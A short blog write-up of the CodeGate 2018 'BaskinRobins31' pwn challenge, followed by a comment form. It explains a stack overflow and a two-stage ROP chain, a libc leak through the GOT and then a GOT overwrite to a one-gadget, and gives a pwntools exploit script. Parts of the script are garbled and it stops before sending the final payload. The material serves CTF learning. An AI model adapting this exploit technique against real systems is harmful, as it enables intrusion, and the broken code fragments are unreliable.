CodeGate 2018 PWN BaskinRobins Write-up


Finally come back from Spring Festival vacation. Since I think Readme-revenge is not a typical example on ROP attack. I think I can use the easiest challenge in CodeGate 2018 to demonstrate the usage of ROP attack.

Vulnerability Analysis

ASLR and stack canary is not enabled in the binary. Furthermore, there is an obvious stack buffer overflow in function your_turn.

Exploit Plan

The exploit is divided into two parts: (l)Leak the libc version via constructing ROP chain to read function pointer in GOT. (2)Construct ROP to use read to overwrite function pointer in GOT to magic gadget.


from pwn import *

DEBUG = int(sys.argv[1]);

if(DEBUG == 0):
    r = remote("", 3131);
elif(DEBUG == 1):
    r = process("./BaskinRobins31");
elif(DEBUG == 2):
    r = process("./BaskinRobins31");
    gdb.attach(r, '''source ./script''');

def exploit():
    helper = 0x40087a;
    junk = 0x424242424242;
    payload = "A"*0xb0;

    payload += p64(0x6020b8);
    payload += p64(helper);
    payload += p64(0) + p64(0x6020c0) + p64(0x80) + p64(0x4008f4);
    payload += p64(junk) * 20;


    payload2 = p64(helper);
    payload2 += p64(0) + p64(0x602028) + p64(0x8) + p64(0x400bbb);
    payload2 += p64(0x6020c0) + p64(0x414141414141)*4;
    payload2 += p64(0x4008f4);


    leakValue1 = u64(r.recv(8));
    leakValue2 = u64(r.recv(8));
    leakValue3 = u64(r.recv(8));
    leakValue4 = u64(r.recv(8));
    leakValue5 = u64(r.recv(8));
    leakValue6 = u64(r.recv(8));
    leakValue7 = u64(r.recv(8));
    leakValue8 = u64(r.recv(8));
    leakValue9 = u64(r.recv(8));"0x%x", leakValue6);"0x%x", leakValue7);"0x%x", leakValue8);"0x%x", leakValue9);

    libcBase = leakValue8 - 0xf7250;"Libc Base: 0x%x", libcBase);

    oneGadget = libcBase + 0xf1147;
    payload3 = p64(oneGadget);




It’s not a difficult but typical ROP challenge. Since Readme-revenge in 34C3 is like a riddle, I take this challenge as an example on ROP attack.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.